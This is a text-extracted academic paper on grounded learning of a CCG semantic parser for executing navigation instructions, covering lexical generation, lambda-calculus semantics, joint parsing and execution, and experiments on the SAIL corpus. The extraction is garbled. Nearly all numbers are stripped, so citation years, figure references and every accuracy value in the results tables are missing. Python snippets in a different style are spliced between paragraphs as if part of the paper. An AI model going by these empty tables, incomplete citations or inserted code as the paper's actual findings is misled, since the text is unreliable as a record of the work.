supervised learning with genlex previous work (zettlemoyer & collins, ) introduced a function genlex(x,z) to map a sentence x and its meaning z to a large set of potential lexical entries. these entries are generated by rules that consider the logical form z and guess potential ccg categories. for example, the rule p → n : λx.p(x) introduces categories commonly used to model certain types of nouns. this rule would, for example, introduce the category n : λx.chair(x) for any logical form z that contains the constant chair. genlex uses a small set of such rules to generate categories that are paired with all possible substrings in x, to create a large set of lexical entries. the complete learning algorithm then simultaneously selects a small sub- set of these entries and estimates parameter values θ. in section , we will introduce a new way of using genlex to learn from different signals that, crucially, do not require a labeled logical form z. spatial environment modeling we will execute instructions in an environment, see section , which has a set of positions. a position is a triple (x,y,o), where x and y are horizontal and vertical coordinates, and o ∈ o = { , , , } is an orientation. a position also includes properties indicating the object it contains, its floor pattern and its wallpaper. for example, the square at ( , ) in figure has four positions, one per orientation. because instructional language refers to objects and other structures in an environment, we introduce the notion of a position set. for example, in figure , the position set d = {( , ,o) : o ∈ o} represents a chair, while b = {(x, ,o) : o ∈ o,x ∈ [ . . . ]} represents the blue floor. both sets contain all ori- entations for each (x,y) pair, thereby representing properties of regions. position sets can have many properties. for example, e, in addition to being a chair, is also an intersection because it overlaps with the neighboring halls a and b. the set of possi- ble entities includes all position sets and a few addi- tional entries. for example, set c = {( , , )} in figure represents the agent’s position. modeling instructional language we aim to design a semantic representation that is learnable, models grounded phenomena such as spa- x   y                               c   d  e   a   b   { d   e   } (a) chair λx.chair(x){ a   b   } (b) hall λx.hall(x) e   (c) the chair ιx.chair(x) c   (d) you you{ b   } (e) blue hall λx.hall(x) ∧ blue(x) { e   } (f) chair in the intersection λx.chair(x) ∧ intersect(ιy.junction(y),x){ a   b   e   } (g) in front of you λx.in front of(you,x) figure : schematic diagram of a map environment and example of semantics of spatial phrases. tial relations and object reference, and is executable. our semantic representation combines ideas from carpenter ( ) and neo-davidsonian event se- mantics (parsons, ) in a simply typed λ- calculus. there are four basic types: ( ) entities e that are objects in the world, ( ) events ev that spec- ify actions in the world, ( ) truth values t, and ( ) meta-entities m, such as numbers or directions. we also allow functional types, which are defined by in- put and output types. for example, 〈e,t〉 is the type of function from entities to truth values. . spatial language modeling nouns and noun phrases noun phrases are paired with e-type constants that name specific en- tities and nouns are mapped to 〈e,t〉-type expres- sions that define a property. 
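Position sets are plain sets of (x, y, o) triples, so the denotation of an 〈e,t〉-type property can be pictured as the set of entities satisfying it. Below is a small sketch with a made-up map and property inventory standing in for the environment of the schematic figure; the names and coordinates are ours, not the corpus's.

```python
from itertools import product

ORIENTATIONS = (0, 1, 2, 3)  # four orientations; the integer encoding is assumed

def region(cells):
    """Position set: all orientations for each (x, y) cell, as in the paper."""
    return frozenset((x, y, o) for (x, y), o in product(cells, ORIENTATIONS))

# A toy map: entity names and coordinates are invented for illustration.
chair_d = region([(1, 3)])
chair_e = region([(4, 3)])
blue_hall_b = region([(x, 3) for x in range(1, 5)])

WORLD = {chair_d: {"chair"},
         chair_e: {"chair", "intersection"},
         blue_hall_b: {"hall", "blue"}}

def denote(prop):
    """Denotation of an <e,t>-type property: the entities satisfying it."""
    return {ent for ent, props in WORLD.items() if prop in props}

print(len(denote("chair")))  # 2 -> the two chairs, like {D, E} in the figure
```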
for example, the noun “chair” (figure a) is paired with the expression λx.chair(x), which defines the set of objects for which the constant chair returns true. the deno- tation of this expression is the set {d,e} in fig- ure and the denotation of λx.hall(x) (figure b) is {a,b}. also, the noun phrase “you” (figure d), which names the agent, is represented by the con- stant you with denotation c, the agent’s position. determiners noun phrases can also be formed by combining nouns with determiners that pick out spe- cific objects in the world. we consider both definite reference, which names contextually unique objects, and indefinites, which are less constrained. the definite article is paired with a logical expres- sion ι of type 〈〈e,t〉,e〉, which will name a sin- gle object in the world. for example, the phrase “the chair” in figure c will be represented by ιx.chair(x) which will denote the appropriate chair. however, computing this denotation is challenging when there is perceptual ambiguity, for positions where multiple chairs are visible. we adopt a sim- ple heuristic approach that ranks referents based on a combination of their distance from the agent and whether they are in front of it. for our example, from position c our agent would pick the chair e in front of it as the denotation. the approach dif- fers from previous, non-grounded models that fail to name objects when faced with such ambiguity (e.g., carpenter ( ), heim and kratzer ( )). to model the meaning of indefinite articles, we depart from the frege-montague tradition of us- ing existential quantifiers (lewis, ; montague, ; barwise & cooper, ), and instead in- troduce a new quantifier a that, like ι, has type 〈〈e,t〉,e〉. for example, the phrase “a chair” would be paired with ax.chair(x) which denotes an arbi- trary entry from the set of chairs in the world. com- puting the denotation for such expressions in a world will require picking a specific object, without fur- ther restrictions. this approach is closely related to steedman’s generalized skolem terms ( ). meta entities we use m-typed terms to represent non-physical entities, such as numbers ( , , etc.) and directions (left, right, etc.) whose denotations although quantifiers are logical constants with type 〈〈e,t〉,e〉 or 〈〈e,t〉, t〉, we use a notation similar to that used for first-order logic. for example, the notation ιx.f(x) repre- sents the logical expression ι(λx.f(x)) steedman ( ) uses generalized skolem terms as a tool for resolving anaphoric pronouns, which we do not model. are fixed. the ability to refer to directions allows us to manipulate position sets. for example, the phrase “your left” is mapped to the logical expres- sion orient(you,left), which denotes the position set containing the position to the left of the agent. prepositions and adjectives noun phrases with modifiers, such as adjectives and prepositional phrases are 〈e,t〉-type expressions that implement set intersection with logical conjunctions. for ex- ample in figure , the phrase “blue hall” is paired with λx.hall(x)∧blue(x) with denotation {b} and the phrase “chair in the intersection” is paired with λx.chair(x) ∧ intersect(ιy.junction(y),x) with denotation {e}. intuitively, the adjective “blue” introduces the constant blue and “in the” adds a intersect. we will describe the full details of how these expressions are constructed in section . . spatial relations the semantic representation al- lows more complex reasoning over position sets and the relations between them. 
for example, the bi- nary relation in front of (figure g) tests if the first argument is in front of the second from the point of view of the agent. additional relations are used to model set intersection, relative direction, relative distance, and relative position by distance. . modeling instructions to model actions in the world, we adopt neo- davidsonian event semantics (davidson, ; par- sons, ), which treats events as ev-type primitive objects. such an approach allows for a compact lex- icon where adverbial modifiers introduce predicates, which are linked by a shared event argument. instructional language is characterized by heavy usage of imperatives, which we model as func- tions from events to truth values. for example, an imperative such as “move” would have the mean- ing λa.move(a), which defines a set of events that match the specified constraints. here, this set would include all events that involve moving actions. the denotation of ev-type terms is a sequence of n instances of the same action. in this way, an event defines a function ev : s → s′, where s is the start state and s′ the end state. for example, the imperatives are 〈ev,t〉-type, much like 〈e,t〉-type wh- interrogatives. both define sets, the former includes actions to execute, the later defines answers to a question. denotation of λa.move(a) is the set of move action sequences {〈move , . . . , moven〉 : n ≥ }. al- though performing actions often require performing additional ones (e.g., the agent might have to turn before being able to move), we treat such actions as implicit (section . ), and don’t model them explic- itly within the logical form. predicates such as move (seen above) and turn are introduced by verbs. events can also be modified by adverbials, which are intersective, much like prepositional phrases. for example in the imperative, logical form (lf) pair: imp.: move from the sofa to the chair lf: λa.move(a) ∧ to(a,ιx.chair(x)) ∧ from(a,ιy.sofa(y)) each adverbial phrase provides a constraint, and changing their order will not change the lf. . parsing instructional language with ccg to compose logical expressions from sentences we use ccg, as described in section . figures and present a sample of lexical entries and how they are combined, as we will describe in this section. the basic syntactic categories are n (noun), np (noun phrase), s (sentence), pp (prepositional phrase), ap (adverbial phrase), adj (adjective) and c (a special category for coordinators). type raising to compactly model syntactic vari- ations, we follow carpenter ( ), who argues for polymorphic typing. we include the more simple, or lower type, entry in the lexicon and introduce type- raising rules to reconstruct the other when necessary at parse time. we use four rules: pp : g → n\n : λf.λx.f(x) ∧g(x) adj : g → n/n : λf.λx.f(x) ∧g(x) ap : g → s\s : λf.λa.f(a) ∧g(a) ap : g → s/s : λf.λa.f(a) ∧g(a) where the first three are for prepositional, adjectival and adverbial modifications, and the fourth models the fact that adverbials are often topicalized. fig- ures and show parses that use type-raising rules. indefinites as discussed in section . , we use a new syntactic analysis for indefinites, follow- using type-raising rules can be particularly useful when learning from sparse data. for example, it will no longer be necessary to learn three lexical entries for each adverbial phrase (with syntax ap , s\s, and s/s). 
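The event-semantics treatment above, where an imperative denotes a set of events and each adverbial adds an intersective constraint, can be mimicked by treating a logical form as a conjunction of predicates over candidate action sequences. This is a toy sketch: the predicate names echo the paper's move and len, but the filtering machinery is ours.

```python
# A toy "event" is just a tuple of primitive actions, e.g. ("move", "move").
def move(ev):
    return len(ev) >= 1 and all(a == "move" for a in ev)

def length(n):
    return lambda ev: len(ev) == n

def conj(*preds):
    """Neo-Davidsonian-style conjunction: every modifier constrains the same event."""
    return lambda ev: all(p(ev) for p in preds)

# "move forward twice"  ~  lambda a. move(a) and len(a, 2)  (direction omitted here)
lf = conj(move, length(2))

candidates = [("move",), ("move", "move"), ("move", "move", "move"), ("left", "move")]
print([ev for ev in candidates if lf(ev)])  # [('move', 'move')]
```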
chair in the corner n pp/np np/n n λx.chair(x) λx.λy.intersect(x,y) λf.ax.f(x) λx.corner(x) > np ιx.corner(x) > pp λy.intersect(ιx.corner(x),y) n\n λf.λy.f(y) ∧ intersect(ιx.chair(x),y) < n λy.chair(y) ∧ intersect(ιx.chair(x),y) figure : a ccg parse with a prepositional phrase. ing steedman ( ). previous approaches would build parses such as with a lamp pp/np pp\(pp/np)/n n λx.λy.intersect(x,y) λf.λg.λy.∃x.g(x,y) ∧ f(x) λx.lamp(x) > pp\(pp/np) λg.λy.∃x.g(x,y) ∧ lamp(x) < pp λy.∃x.intersect(x,y) ∧ lamp(x) where “a” has the relatively complex syntactic cate- gory pp\(pp/np)/n and where similar entries would be needed to quantify over different types of verbs (e.g., s\(s/np)/n) and adverbials (e.g., ap\(ap/np)/n). instead, we include a single lexical entry a ` np/n : λf.ax.f(x) which can be used to construct the correct meaning in all cases. joint parsing and execution our inference includes an execution component and a parser. the parser maps sentences to logical forms, and incorporates the grounded execution model. we first discuss how to execute logical forms, and then describe the joint model for execution and parsing. . executing logical expressions dynamic models in spatial environments, such as the ones in our task, the agent’s ability to observe the world depends on its current state. taking this aspect of spatial environments into account is challenging, but crucial for correct evaluation. to represent the agent’s point of view, for each state s ∈ s, as defined in section , let ms be the state-dependent logical model. a model m consists of a domain dm,t of objects for each type t and an interpretation function im,t : ot → dm,t , where ot is the set of t -type constants. im,t maps logical symbols to t -type objects, for exam- ple, it will map you to the agent’s position. we have domains for position sets, actions and so on. fi- nally, let vt be the set of variables of type t , and facing the lamp go until you reach a chair ap/np np/n n s ap/s np s\np/np np/n n λx.λa.pre(a, λf.ιx.f(x) λx.lamp(x) λa.move(a) λs.λa.post(a,s) you λx.λy.intersect(x,y) λf.ax.f(x) λx.chair(x) front(you,x)) > > np np ιx.lamp(x) ax.chair(x) > > ap s\np λa.pre(a,front(you,ιx.lamp(x))) λy.intersect(ax.chair(x),y) < s/s s λf.λa.f(a) ∧ pre(a,front(you,ιx.lamp(x))) intersect(ax.chair(x),you) > ap λa.post(a,intersect(ax.chair(x),you)) s\s λf.λa.f(a) ∧ post(a,intersect(ax.chair(x),you)) < s λa.move(a) ∧ post(a,intersect(ax.chair(x),you)) > s λa.move(a) ∧ post(a,intersect(ax.chair(x),you)) ∧ pre(a,front(you,ιx.lamp(x))) figure : a ccg parse showing adverbial phrases and topicalization. at : vt → ⋃ s∈s dms,t be the assignment func- tion, which maps variables to domain objects. for each model ms the domain dms,ev is a set of action sequences {〈a , ...,an〉 : n ≥ }. each ~a defines a sequences of states si, as defined in sec- tion . , and associated models msi. the key chal- lenge for execution is that modifiers of the event will need to be evaluated under different models from this sequence. for example, consider the sentence in figure . to correctly execute, the pre literal, in- troduced by the “facing” phrase, it must be evaluated in the model ms for the initial state s . similarly, the literal including post requires the final model msn+ . such state dependent predicates, including pre and post, are called stateful. 
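The role of stateful predicates can be illustrated by simulating an action sequence and checking a pre constraint against the initial state and a post constraint against the final state. This is only a schematic rendering of the model-selection idea, with invented constraint names and a trivial one-dimensional world.

```python
def simulate(transition, s0, actions):
    """Return the list of states visited while executing the action sequence."""
    states = [s0]
    for a in actions:
        states.append(transition(a, states[-1]))
    return states

def check(actions, s0, transition, pre=None, post=None):
    """Evaluate 'pre' against the initial state and 'post' against the final one,
    mirroring how stateful predicates pick their model during evaluation."""
    states = simulate(transition, s0, actions)
    ok_pre = pre(states[0]) if pre else True
    ok_post = post(states[-1]) if post else True
    return ok_pre and ok_post

# Toy world: states are integers, "move" adds 1; constraint names are invented.
step = lambda a, s: s + 1 if a == "move" else s
facing_lamp = lambda s: s == 0   # stand-in for pre(a, front(you, lamp))
at_chair = lambda s: s == 2      # stand-in for post(a, intersect(chair, you))

print(check(("move", "move"), 0, step, pre=facing_lamp, post=at_chair))  # True
```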
the list of stateful predicates is pre-defined and includes event modi- fiers, as well the ι quantifier, which is evaluated un- der ms , since definite determiners are assumed to name objects visible from the start position. in gen- eral, a logical expression is traversed depth first and the model is updated every time a stateful predicate is reached. for example, the two e-type you con- stants in figure will be evaluated under different models: the one within the pre literal under ms , and the one inside the post literal under msn+ . evaluation given a logical expression l, we can compute the interpretation ims ,t (l) by recursively mapping each subexpression to an entry on the ap- propriate model m. to reflect the changing state of the agent during evaluation, we define the function update(~a,pred). given an action sequence ~a and a stateful predi- cate pred, update returns a model ms, where s is the state under which the literal containing pred should be interpreted, either the initial state or one visited while executing ~a. for example, given the predicate post and the action sequence 〈a , . . . ,an〉, update(〈a , . . . ,an〉,post) = msn+ , where sn+ the state of the agent following action an. by con- vention, we place the event variable as the first argu- ment in literals that include one. given a t -type logical expression l and a start- ing state s , we compute its interpretation ims ,t (l) recursively, following these three base cases: • if l is a λ operator of type 〈t ,t 〉 binding vari- able v and body b, ims,t (l) is a set of pairs from dt ×dt , where dt ,dt ∈ ms. for each object o ∈ dt , we create a pair (o,i) where i is the interpretation ims,t (b) com- puted under a variable assignment function ex- tended to map at (v) = o. • if l is a literal c(c , . . . ,cn) with n argu- ments where c has type p and each ci has type pi, ims,t (l) is computed by first in- terpreting the predicate c to the function f = ims,t (c). in most cases, ims,t (l) = f(ims,p (c ), . . . ,ims,pn(cn)). however, if c is a stateful predicate, such as pre or post, we instead first retrieve the appropriate new model ms′ = update(ims,p (c ),c), where c is the event argument and ims,p (c ) is its interpre- tation. then, the final results is ims,t (l) = f(ims′,p (c ), . . . ,ims′,pn(cn)). • if l is a t -type constant or variable, ims,t (l). the worst case complexity of the process is ex- ponential in the number of bound variables. al- though in practice we observed tractable evaluation in the majority of development cases we considered, a more comprehensive and tractable evaluation pro- cedure is an issue that we leave for future work. implicit actions instructional language rarely specifies every action required for execution, see macmahon ( ) for a detailed discussion in the maps domain. for example, the sentence in fig- ure can be said even if the agent is not facing a blue hallway, with the clear implicit request that it should turn to face such a hallway before moving. to allow our agent to perform implicit actions, we extend the domain of ev-type variables by allowing the agent to prefix up to ki action sequences before each explicit event. for example, in the agent’s po- sition in figure (set c), the set of possible events includes 〈movei, movei, righti, move〉, which contains two implicit sequences (marked by i). resolving action ambiguity logical forms of- ten fail to determine a unique action sequences, due to instruction ambiguity. 
for example, con- sider the instruction “go forward” and the agent state as specified in figure (set c). the instruction, which maps to λa.move(a) ∧ forward(a), evalu- ates to the set containing 〈move〉, 〈move, move〉 and 〈move, move, move〉, as well as five other se- quences that have implicit prefixes followed by ex- plicit move actions. to resolve such ambiguity, we prefer shorter actions without implicit actions. in the example above, we will select 〈move〉, which includes a single action and no implicit actions. . joint inference we incorporate the execution procedure described above with a linear weighted ccg parser, as de- scribed in section , to create a joint model of pars- ing and execution. specifically, we execute logi- cal forms in the current state and observe the result of their execution. for example, the word “chair” can be used to refer to different types of objects, in- cluding chairs, sofas, and barstools, in the maps do- mains. our ccg grammar would include a lexical item for each meaning, but execution might fail de- pending on the presence of objects in the world, in- fluencing the final parse output. similarly, allowing implicit actions provides robustness when resolv- ing these and other ambiguities. for example, an instruction with the precondition phrase “from the chair” might require additional actions to reach the position with the named object. to allow such joint reasoning we define an ex- ecution e to include a parse tree ey and trace e~a, and define our feature function to be Φ(xi,si,e), where xi is an instruction and si is the start state. this approach allows joint dependencies: the state of the world influences how the agent interprets words, phrases and even complete sentences, while language understanding determines actions. finally, to execute sequences of instructions, we execute each starting from the end state of the previ- ous one, using a beam of size ks. learning figure presents the complete learning algorithm. our approach is online, considering each example in turn and performing two steps: expanding the lex- icon and updating parameters. the algorithm as- sumes access to a training set {(xi,si,vi) : i = . . .n}, where each example includes an instruction xi, starting state si and a validation function vi, as defined in section . in addition the algorithm takes a seed lexicon Λ . the output is a joint model, that includes a lexicon Λ and parameters θ. coarse lexical generation to generate po- tential lexical entries we use the function genlex(x,s,v; Λ,θ), where x is an in- struction, s is a state and v is a validation function. Λ is the current lexicon and θ is a parameter vector. in genlex we use coarse logical constants, as described below, to efficiently prune the set of potential lexical entries. this set is then pruned further using more precise inference in step . to compute genlex, we initially generate a large set of lexical entries and then prune most of them. the full set is generated by taking the cross product of a set of templates, computed by factor- ing out all templates in the seed lexicon Λ , and all logical constants. for example, if Λ has a lexical item with the category ap/np : λx.λa.to(a,x) we would create entries w ` ap/np : λx.λa.p(a,x) for every phrase w in x and all constants p with the same type as to. in our development work, this approach often generated nearly k entries per sentence. to ease generalizing previous work (kwiatkowski et al., ), we allow templates that abstract subsets of the constants in a lex- ical item. 
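The coarse GENLEX step is essentially a cross product of phrases, templates factored from the seed lexicon, and appropriately typed constants. Below is a hedged sketch with a tiny invented template and constant inventory; the real procedure also abstracts subsets of constants and prunes candidates with the coarse-to-fine parse described next.

```python
from itertools import product

# A template abstracts over logical constants: here, a function from a constant
# name to a (syntactic category, logical form) pair. Both entries are invented.
TEMPLATES = {
    "AP/NP": lambda p: ("AP/NP", f"lambda x. lambda a. {p}(a, x)"),
    "N":     lambda p: ("N",     f"lambda x. {p}(x)"),
}
CONSTANTS = {"AP/NP": ["to", "from", "pre", "post"],
             "N": ["chair", "hall", "corner"]}

def genlex(phrases):
    """Cross product of phrases, templates and appropriately typed constants."""
    entries = []
    for phrase, (syn, make) in product(phrases, TEMPLATES.items()):
        for const in CONSTANTS[syn]:
            entries.append((phrase, make(const)))
    return entries

entries = genlex(["to", "the chair", "to the chair"])
print(len(entries))  # 3 phrases x (4 + 3) categories = 21 candidate entries
print(entries[0])    # ('to', ('AP/NP', 'lambda x. lambda a. to(a, x)'))
```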
for example, the seed entry facing ` ap/np : λx.λa.pre(a,front(you,x)) would create templates. inputs: training set {(xi,si,vi) : i = . . .n} where xi is a sentence, si is a state and vi is a validation function, as de- scribed in section . initial lexicon Λ . number of iterations t . margin γ. beam size k for lexicon generation. definitions: let an execution e include a parse tree ey and a trace e~a. gen(x,s; Λ) is the set of all possible execu- tions for the instruction x and state s, given the lexicon Λ. lex(y) is the set of lexical entries used in the parse tree y. let Φi(e) be shorthand for the feature function Φ(xi,si,e) defined in section . . define ∆i(e,e′) = |Φi(e)−Φi(e′)| . genlex(x,s,v; λ,θ) takes as input an instruction x, state s, validation function v, lexicon λ and model param- eters θ, and returns a set of lexical entries, as defined in sec- tion . finally, for a set of executions e let maxvi(e; θ) be {e|∀e′ ∈ e,〈θ, Φi(e′)〉≤ 〈θ, Φi(e)〉∧vi(e~a) = }, the set of highest scoring valid executions. algorithm: initialize θ using Λ , Λ ← Λ for t = . . .t,i = . . .n : step : (lexical generation) a. set λg ← genlex(xi,si,vi; Λ,θ), λ ← Λ ∪λg b. let e be the k highest scoring executions from gen(xi,si; λ) which use at most one entry from λg c. select lexical entries from the highest scoring valid parses: λi ← ⋃ e∈maxvi(e;θ) lex(e y) d. update lexicon: Λ ← Λ ∪λi step : (update parameters) a. set gi ← maxvi(gen(xi,si; Λ); θ) and bi ←{e|e ∈ gen(xi,si; Λ) ∧vi(e~a) = } b. construct sets of margin violating good and bad parses: ri ←{g|g ∈ gi ∧ ∃b ∈ bi s.t. 〈θ, Φi(g) − Φi(b)〉 < γ∆i(g,b)} ei ←{b|b ∈ bi ∧ ∃g ∈ gi s.t. 〈θ, Φi(g) − Φi(b)〉 < γ∆i(g,b)} c. apply the additive update: θ ← θ + |ri| ∑ r∈ri Φi(r) − |ei| ∑ e∈ei Φi(e) output: parameters θ and lexicon Λ figure : the learning algorithm. the cost of parsing at this scale, we developed a coarse-to-fine two-pass parsing approach that lim- its the number of new entries considered. the algo- rithm first parses with coarse lexical entries that ab- stract the identities of the logical constants in their logical forms, thereby greatly reducing the search space. it then uses the highest scoring coarse parses to constrain the lexical entries for a final, fine parse. formally, we construct the coarse lexicon λa by replacing all constants of the same type with a single newly created, temporary constant. we then parse to create a set of trees a, such that each y ∈ a . is a parse for sentence x, given the world state s with the combined lexicon Λ ∪λa, . scored higher than ey by at least a margin of δl, where ey is the tree of e, the highest scoring execution of x, at position s under the current model, s.t. v(e~a) = , . contains at most one entry from λa. finally, from each entry l ∈ {l|l ∈ λa ∧ l ∈ y ∧ y ∈ a}, we create multiple lexical entries by replacing all temporary constants with all possible appropriately typed constants from the original set. genlex returns all these lexical entries, which will be used to form our final fine-level analysis. step : lexical induction to expand our model’s lexicon, we use genlex to generate candidate lexical entries and then further refine this set by pars- ing with the current model. step (a) in figure uses genlex to create a temporary set of po- tential lexical entries λg. 
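The validation-driven parameter update of step 2 can be sketched as an additive perceptron step over sparse feature vectors. The margin handling is simplified here (a single fixed margin rather than one scaled by the number of differing features), and the execution records are fabricated; this is not the full algorithm of the figure.

```python
from collections import defaultdict

def sparse_add(theta, phi, scale):
    for f, v in phi.items():
        theta[f] += scale * v

def perceptron_update(theta, executions, validate, score, margin=1.0):
    """Simplified step 2: move weights toward the highest-scoring valid
    executions and away from margin-violating invalid ones."""
    valid = [e for e in executions if validate(e)]
    invalid = [e for e in executions if not validate(e)]
    if not valid or not invalid:
        return
    best = max(score(e) for e in valid)
    good = [e for e in valid if score(e) == best]
    bad = [e for e in invalid if score(e) > best - margin]
    if not bad:
        return
    for e in good:
        sparse_add(theta, e["phi"], 1.0 / len(good))
    for e in bad:
        sparse_add(theta, e["phi"], -1.0 / len(bad))

# Tiny worked example with invented features and a final-state validation.
theta = defaultdict(float)
execs = [{"phi": {"good_feat": 1.0}, "end": "chair"},
         {"phi": {"bad_feat": 1.0}, "end": "sofa"}]
perceptron_update(theta, execs,
                  validate=lambda e: e["end"] == "chair",
                  score=lambda e: sum(theta[f] * v for f, v in e["phi"].items()))
print(dict(theta))  # {'good_feat': 1.0, 'bad_feat': -1.0}
```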
steps (b-d) select a small subset of these lexical entries to add to the current lexicon Λ: we find the k-best executions under the model, which use at most one entry from λg, find the entries used in the best valid executions and add them to the current lexicon. step : parameter update we use a variant of a loss-driven perceptron (singh-miller & collins, ; artzi & zettlemoyer, ) for parameter up- dates. however, instead of taking advantage of a loss function we use a validation signal. in step (a) we collect the highest scoring valid parses and all in- valid parses. then, in step (b) we construct the set ri of valid analyses and ei of invalid ones, such that their model scores are not separated by a mar- gin δ scaled by the number of wrong features (taskar et al., ). finally, step (f) applies the update. discussion the algorithm uses the validation sig- nal to drive both lexical induction and parameter updates. unlike previous work (zettlemoyer & collins, , ; artzi & zettlemoyer, ), we have no access to a set of logical constants, either through the the labeled logical form or the weak supervision signal, to guide the genlex procedure. therefore, to avoid over-generating lex- ical entries, thereby making parsing and learning intractable, we leverage typing for coarse parsing to prune the generated set. by allowing a single oracle sail # of instruction sequences # of instruction sequences with implicit actions total # of sentences avg. sentences per sequence . . avg. tokens per sentence . . vocabulary size table : corpora statistics (lower-cased data). new entry per parse, we create a conservative, cas- cading effect, whereas a lexical entry that is intro- duced opens the way for many other sentence to be parsed and introduce new lexical entries. further- more, grounded features improve parse selection, thereby generating higher quality lexical entries. experimental setup data for evaluation, we use the navigation task from macmahon et al. ( ), which includes three environments and the sail corpus of instructions and follower traces. chen and mooney ( ) seg- mented the data, aligned traces to instructions, and merged traces created by different subjects. the corpus includes raw sentences, without any form of linguistic annotation. the original collection pro- cess (macmahon et al., ) created many unin- terpretable instructions and incorrect traces. to fo- cus on the learning and interpretation tasks, we also created a new dataset that includes only accurate in- structions labeled with a single, correct execution trace. from this oracle corpus, we randomly sam- pled instruction sequences ( sentences) for evaluation, leaving ( sentences) for train- ing. this simple effort will allow us to measure the effects of noise on the learning approach and pro- vides a resource for building more accurate algo- rithms. table compares the two sets. features and parser following zettlemoyer and collins ( ), we use a cky parser with a beam of k. to boost recall, we adopt a two-pass strategy, which allows for word skipping if the initial parse fails. we use features that indicate usage of lexical entries, templates, lexemes and type-raising rules, as described in section . , and repetitions in logical coordinations. finally, during joint parsing, we con- sider only parses executable at si as complete. seed lexicon to construct our seed lexicon we la- beled instruction sequences with lexical en- single sentence sequence final state validation complete system . ( . ) . ( . ) no implicit actions . ( . ) . ( . 
) no joint execution . ( . ) . ( . ) trace validation complete system . ( . ) . ( . ) no implicit actions . ( . ) . ( . ) no joint execution . ( . ) . ( . ) table : cross-validation development accuracy and standard deviation on the oracle corpus. tries. the sequences were randomly selected from the training set, so as to include two sequences for each participant in the original experiment. fig- ures and include a sample of our seed lexicon. initialization and parameters we set the weight of each template indicator feature to the number of times it is used in the seed lexicon and each repeti- tion feature to - . learning parameters were tuned using cross-validation on the training set: the mar- gin δ is set to , the genlex margin δl is set to , we use iterations ( for experiments on sail) and take the top parses during lexical genera- tion (step , figure ). for parameter update (step , figure ) we use a parser with a beam of . genlex generates lexical entries for token se- quences up to length . ks, the instruction sequence execution beam, is set to . finally, ki is set to , allowing up to two implicit action sequences per explicit one. evaluation metrics to evaluate single instruc- tions x, we compare the agent’s end state to a labeled state s′, as described in section . we use a similar method to evaluate the execution of instruction se- quences ~x, but disregard the orientation, since end goals in macmahon et al. ( ) are defined with- out orientation. when evaluating logical forms we measure exact match accuracy. results we repeated each experiment five times, shuffling the training set between runs. for the development cross-validation runs, we also shuffled the folds. as our learning approach is online, this allows us to ac- count for performance variations arising from train- ing set ordering. we report mean accuracy and stan- dard deviation across all runs (and all folds). single sentence sequence chen and mooney ( ) . . chen ( ) . . + additional data . . kim and mooney ( ) . . trace validation . ( . ) . ( . ) final state validation . ( . ) . ( . ) table : cross-validation accuracy and standard de- viation for the sail corpus. table shows accuracy for -fold cross- validation on the oracle training data. we first varied the validation signal by providing the complete ac- tion sequence or the final state only, as described in section . although the final state signal is weaker, the results are similar. the relatively large difference between single sentence and sequence performance is due to ( ) cascading errors in the more difficult task of sequential execution, and ( ) corpus repe- titions, where simple sentences are common (e.g., “turn left”). next, we disabled the system’s ability to introduce implicit actions, which was especially harmful to the full sequence performance. finally, ablating the joint execution decreases performance, showing the benefit of the joint model. table lists cross validation results on the sail corpus. to compare to previous work (chen & mooney, ), we report cross-validation results over the three maps. the approach was able to cor- rectly execute % more sequences then the previ- ous state of the art (kim & mooney, ). we also outperform the results of chen ( ), which used % more training data. using the weaker validation signal creates a marginal decrease in per- formance. however, we still outperform all previ- ous work, despite using weaker supervision. 
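The evaluation metrics described above reduce to simple state comparisons. The sketch below assumes states are (x, y, o) triples and, for instruction sequences, ignores orientation as the text specifies; the function names are ours.

```python
def correct_single(pred_state, gold_state):
    """Single-instruction evaluation: the agent's end state must match exactly."""
    return pred_state == gold_state

def correct_sequence(pred_state, gold_state):
    """Sequence evaluation: orientation is disregarded, since end goals are
    defined without it; states are assumed to be (x, y, o) triples."""
    return pred_state[:2] == gold_state[:2]

print(correct_single((2, 3, 90), (2, 3, 0)))    # False
print(correct_sequence((2, 3, 90), (2, 3, 0)))  # True
```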
inter- estingly, these increases were achieved with a rel- atively simple executor, while previous work used marco (macmahon et al., ), which supports sophisticated recovery strategies. finally, we evaluate our approach on the held out test set for the oracle corpus (table ). in contrast to experiments on the chen and mooney ( ) cor- pus, we use a held out set for evaluation. due to this discrepancy, all development was done on the train- ing set only. the increase in accuracy over learning with the original corpus demonstrates the significant impact of noise on our performance. in addition to this additional training data isn’t publicly available. validation single sentence sequence lf final state . ( . ) . ( . ) ( . ) trace . ( . ) . ( . ) . ( . ) table : oracle corpus test accuracy and standard deviation results. execution results, we also report exact match logi- cal form (lf) accuracy results. for this purpose, we annotated instruction sequences ( sentences) with logical forms. the gap between execution and lf accuracy can be attributed to the complexity of the linguistic representation and redundancy in in- structions. these results provide a new baseline for studying learning from cleaner supervision. discussion we showed how to do grounded learning of a ccg semantic parser that includes a joint model of mean- ing and context for executing natural language in- structions. the joint nature allows situated cues to directly influence parsing and also enables algo- rithms that learn while executing instructions. this style of algorithm, especially when using the weaker end state validation, is closely related to re- inforcement learning approaches (branavan et al., , ). however, we differ on optimization and objective function, where we aim for minimal loss. we expect many rl techniques to be useful to scale to more complex environments, including sampling actions and using an exploration strategy. we also designed a semantic representation to closely match the linguistic structure of instructional language, combining ideas from many semantic theories, including, for example, neo-davidsonian events (parsons, ). this approach allowed us to learn a compact and executable grammar that gen- eralized well. we expect, in future work, that such modeling can be reused for more general language. acknowledgments the research was supported in part by darpa un- der the deft program through the afrl (fa - - - ) and the cssg (n ap ), the aro (w nf- - - ), and the nsf (iis- ). the authors thank tom kwiatkowski, nicholas fitzgerald and alan ritter for helpful discussions, david chen for providing the evaluation corpus, and the anonymous reviewers for helpful comments. references artzi, y., & zettlemoyer, l. ( ). bootstrapping se- mantic parsers from conversations. in proceed- ings of the conference on empirical methods in natural language processing. barwise, j., & cooper, r. ( ). generalized quanti- fiers and natural language. linguistics and phi- losophy, ( ), – . branavan, s., chen, h., zettlemoyer, l., & barzilay, r. ( ). reinforcement learning for mapping in- structions to actions. in proceedings of the joint conference of the association for computational linguistics and the international joint conference on natural language processing. branavan, s., zettlemoyer, l., & barzilay, r. ( ). reading between the lines: learning to map high- level instructions to commands. in proceedings of the conference of the association for computa- tional linguistics. 
